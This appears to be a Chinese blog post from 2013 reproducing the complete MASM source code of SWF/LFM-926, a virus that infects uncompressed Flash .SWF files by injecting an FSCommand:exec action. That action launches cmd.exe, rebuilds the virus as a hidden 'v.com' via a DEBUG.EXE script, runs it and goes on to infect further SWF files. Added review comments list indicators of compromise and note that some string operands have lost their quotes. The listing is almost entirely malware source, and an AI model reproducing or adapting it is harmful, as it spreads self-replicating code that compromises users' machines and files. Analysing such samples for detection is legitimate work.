第一只感染flash的病毒源代码

Jonty
2013-03-01 / 0 评论 / 97 阅读 / 正在检测是否收录...

代码如下:

SWF/LFM-926 Virus: 
; ------------------ 
; Description: WinNT/XP Virus dropper for Flash .SWF files! 
; Masm Version 6.11: ML.EXE SWF.ASM 
; Virus Size: 926 bytes 
; Infection Size: 3247 bytes. 
; Last Edit: 01/08/2002 
; --------------------------------- Begin Source Code ------------------------------------ 

;-----------------------------------------------------------------------
; NOTE(review): historical sample (SWF/LFM-926, per the page header),
; reproduced as published for analysis only; it is not assembled here.
; Several string operands in this transcription have lost their quote
; characters (the command-line fragments between Drop_BEGIN and Drop_END,
; and the signature compares in Infect) and are left exactly as published.
;
; Detection-relevant layout, all values taken from this listing:
;   - Hosts are uncompressed SWF files (3-byte "FWS" signature, checked in
;     Infect); compressed "CWS" hosts fail that check and are skipped.
;   - Infected files carry SWF version byte 099h (VERSION_NUM) as the
;     infection marker, and a frame count one higher than the original.
;   - The inserted tag is a long-form DoAction (bytes 03fh,003h) holding one
;     ActionGetUrl (083h) whose URL string is "FSCommand:exec" and whose
;     target string is a cmd.exe command line that uses 009h for spaces.
;   - That command line echoes a DEBUG.EXE script which rebuilds the 926-byte
;     image as "v.com" in the current directory and starts it; ExProg then
;     sets the hidden attribute on that file. "v.com" is the on-disk IoC.
;-----------------------------------------------------------------------
.286                                    ; immediate shift counts (shr ax,12 in ToHex) need .186 or later
.model tiny
.code
org 100h Entry: jmp Start               ; .COM image; the first jump skips the data and dropper text below
VIR_SIZE equ Virus_End-Entry            ; whole image size (926 = 39Eh bytes per header; also hard-coded as text in Drop_END)
DTA db 128 dup(0) ; Offset DTA+30 = filename (DOS Disk Transfer Area used by FindFirst/FindNext)
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block (only the high word PTR1+2 is ever written; offset stays 0)
PATH db "*.SWF",0 ; File mask (current directory only; no directory recursion in this code)
BINARY db "v.com",0 ; Binary code (name of the file the dropped DEBUG script creates; hidden by ExProg)
HEX db "0123456789ABCDEF" ; Binary to hex (xlat table for ToHex)
; Flash header block.
; -------------------
; These fields are read straight from the host with one 28-byte read
; (STATIC_HDR_SIZE+RECT_BUF_SIZE) and written back, patched, at the end of Infect.
SIGN_FW dw ? ; SWF file format: first two signature bytes ("FW")
SIGN_S db ? ; third signature byte ("S")
VERSION_NUM db ? ; SWF version byte; overwritten with 099h as the infection marker
FILE_LENGTH dw ? ; low word of the 32-bit uncompressed file length; the only part this code uses
dw ? ; high word of the file length; read and written back but never consulted
STATIC_HDR_SIZE equ $-SIGN_FW ; = 8 fixed header bytes
RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isn't static. ;( (scanned for the SetBackgroundColor tag)
RECT_BUF_SIZE equ $-RECT_BUF
HDR_SIZE dw ? ; Holds the true header size! (STATIC_HDR_SIZE + offset of SetBackgroundColor within RECT_BUF)
; Start of Viral Frame 0.
; -----------------------
; Drop_BEGIN / Drop_MIDDLE / Drop_END are written to the host in that order;
; Drop_MIDDLE is emitted once per 24 image bytes (plus a partial last line).
Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! (word 033fh = code 12, length 03fh = long form)
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] (low word of the long-form tag length; patched in Infect)
dw 0 ; high word of the long-form tag length
db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE)
db FSCommand:exec ; URL string of the ActionGetUrl (quotes lost in transcription)
db 000h ; end of URL string
db cmd.exe ; target string: the command line, continued through Drop_END
db 009h ; chr(9) is Flash code for a space character.
db /c
db 009h
db echo
db 009h
db Loading.Flash.Movie... ; decoy text shown while the script runs
db &
db (echo ; start of the DEBUG.EXE script fed through the pipe in Drop_END
db 009h
db n
db 009h
db v.com&echo ; DEBUG "n" line: output file name
db 009h
db a
db 009h
db 100& ; DEBUG "a 100" line: following "db" lines land at offset 100h
Drop_BEGIN_SIZE equ $-Drop_BEGIN
Drop_MIDDLE db echo ; one DEBUG "db" line; filled in by ToHex
db 009h
db db
db 009h
db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. (24 bytes * 3 chars, minus the final separator)
db &
Drop_MIDDLE_SIZE equ $-Drop_MIDDLE
Drop_END db &echo.&echo ; leading "&" also closes a partial last Drop_MIDDLE line
db 009h
db rcx&echo ; DEBUG "rcx" line: byte count to write
db 009h
db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
db &echo
db 009h
db w&echo ; DEBUG "w": write the file
db 009h
db q)|debug.exe>nul&start ; DEBUG "q", then the rebuilt file is started
db 009h
db /b
db 009h
db v.com
db 000h ; StringEnd Tag
Drop_END_SIZE equ $-Drop_END
; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag (written right after Drop_END, see Infect)
;-----------------------------------------------------------------------
; Start: real entry point (reached by the jmp at Entry).
; Shrinks the program's memory block, sets the DTA, then enumerates *.SWF
; in the current directory with FindFirst/FindNext (attribute mask 07h, so
; read-only, hidden and system files are included) and hands each match to
; Infect. ExProg is the single exit path, used both when the search ends and
; when any DOS call in Infect fails: it sets the hidden attribute on "v.com"
; (the file the dropped DEBUG script creates) and terminates.
; Registers: bx = paragraph count for the resize; dx = DTA / PATH pointers.
;-----------------------------------------------------------------------
Start:
mov ax,(VIR_SIZE+0fh)                   ; paragraphs = ((VIR_SIZE+15)/16)*2
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg
mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h
mov cx,07h                              ; search attributes: read-only | hidden | system
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg                               ; no *.SWF present: exit
jmp Infect
Cycle:                                  ; re-entered from Infect after each host (infected or skipped)
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg                               ; no more matches: exit
jmp Infect
ExProg:
mov ax,4301h ; Hide v.com (set file attributes; cx=02h = hidden). Fails silently if the file does not exist.
mov cx,02h
mov dx,offset BINARY
int 21h
mov ax,4c00h ; End program (exit code 0)
int 21h
;-----------------------------------------------------------------------
; Infect: splice the dropper into the SWF named in the DTA (DTA+30).
; Sequence visible below: open the host, read the 28-byte header window,
; check the "FWS" signature, skip hosts already marked 099h, locate the
; SetBackgroundColor tag (043h,002h) to get the true header size, buffer the
; remainder of the host in a fresh DOS memory block, write the DoAction tag
; (Drop_BEGIN text, hex dump of this image as DEBUG "db" lines, Drop_END
; text + END_TAG), re-append the buffered host body, then patch the length
; fields, marker and frame count in the header and write it back.
; Every DOS error jumps to ExProg (no attempt at the next file). Only the
; low word of the SWF length is used, so the high word is ignored.
; Remediation note: the original body is written back intact after the
; inserted tag and FILE_LENGTH grows by exactly TAG_LENGTH+6, so in principle
; a clean copy is recoverable from an infected file.
; Registers across the routine: bx = host file handle (except where noted),
; si = index into this image, di = output column in Drop_MIDDLE.
;-----------------------------------------------------------------------
Infect:
mov byte ptr DTA[30+12],$               ; operand garbled in this transcription; writes the last byte of the 13-byte filename field
mov dx,offset (DTA+30)
mov ax,3d02h ; Open host file (read/write)
int 21h
jc ExProg
mov [HANDLE],ax ; Save file handle
mov ax,3f00h ; Read file Header (28 bytes: fixed fields + RECT window)
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg
cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. (quotes lost in transcription; expects bytes "FW" then "S", i.e. uncompressed "FWS")
jne Cycle ; Try another file ... (compressed "CWS" hosts are skipped here)
cmp byte ptr SIGN_S,S
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected? (version byte 099h is the marker; see the write near the end)
je Cycle
mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. (bytes 43h,02h = tag header 0243h: code 9, length 3)
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle                               ; tag not found within the 20-byte window: skip this host
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size (di = offset of SetBackgroundColor within RECT_BUF)
mov ax,4200h ; Reset file ptr right after Flash header
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg
push bx                                 ; bx (handle) is reused as the paragraph count for the allocation
mov ax,word ptr FILE_LENGTH
add ax,15
shr ax,4                                ; paragraphs = (FILE_LENGTH+15)/16
mov bx,ax
mov ah,48h ; Allocate memory for target host file
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block (segment only; offset stays 0)
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]                       ; bytes of host body after the header
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,Drop_BEGIN_SIZE                  ; leave a gap for Drop_BEGIN, which is written last (after the header patch)
int 21h
jc ExProg
;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;
mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) ; fixed part; each Drop_MIDDLE line written below is added as it goes
push bx                                 ; save the handle: bx is the xlat table base inside the loop
mov cx,VIR_SIZE                         ; cx = image bytes still to convert
xor si,si                               ; si = index into the image (Entry[si])
xor di,di                               ; di = output column within the hex area of Drop_MIDDLE
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex number (bx reloaded every pass because bl is clobbered below)
mov al,byte ptr Entry[si]
mov ah,al                               ; keep a copy of the byte in ah
and al,00001111y                        ; low nibble -> second hex character
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al ; STATIC_HDR_SIZE (8) doubles as the length of the "echo<tab>db<tab>" prefix
shr ax,12                               ; high nibble of the original byte -> al
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di                                  ; each byte occupies three output characters: XX plus separator
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl                                  ; ah = si mod 24
or ah,ah
jnz cont                                ; line not full yet
push cx                                 ; preserve the byte counter around the write
xor di,di                               ; start the next line at column 0
add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset Drop_MIDDLE
mov cx,Drop_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg                               ; exits with cx/bx still pushed; harmless because ExProg terminates
pop cx
cont:
loop ToHex
pop bx                                  ; bx = handle again
or di,di
jz no_remainder                         ; image size was a multiple of 24: no partial line
mov dx,offset Drop_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1 (prefix plus hex text, without the trailing separator)
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg
no_remainder:
mov dx,offset Drop_END
mov cx,Drop_END_SIZE+1                  ; +1 covers END_TAG, which directly follows Drop_END in memory
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code. (original body preserved unchanged)
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
mov cx,word ptr ACTION_LENGTH
add cx,4                                ; presumably 083h + 2-byte length word + END_TAG
mov word ptr TAG_LENGTH,cx
add cx,6                                ; 2-byte tag header + 4-byte long length
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker
mov byte ptr VERSION_NUM,099h           ; detection signal: SWF version byte 099h
mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 (word immediately before the SetBackgroundColor tag)
mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg
mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header
int 21h
jc ExProg
mov dx,offset Drop_BEGIN
mov cx,Drop_BEGIN_SIZE
mov ax,4000h ; Write begin code into host (fills the gap left before the hex dump)
int 21h
jc ExProg
mov ah,49h ; Free memory block
mov es,word ptr PTR1[2]
int 21h
jc ExProg
mov ax,3e00h ; Close file (bx = handle)
int 21h
jc ExProg
jmp Cycle ; DONE! Try to infect another.
Virus_End:
end Entry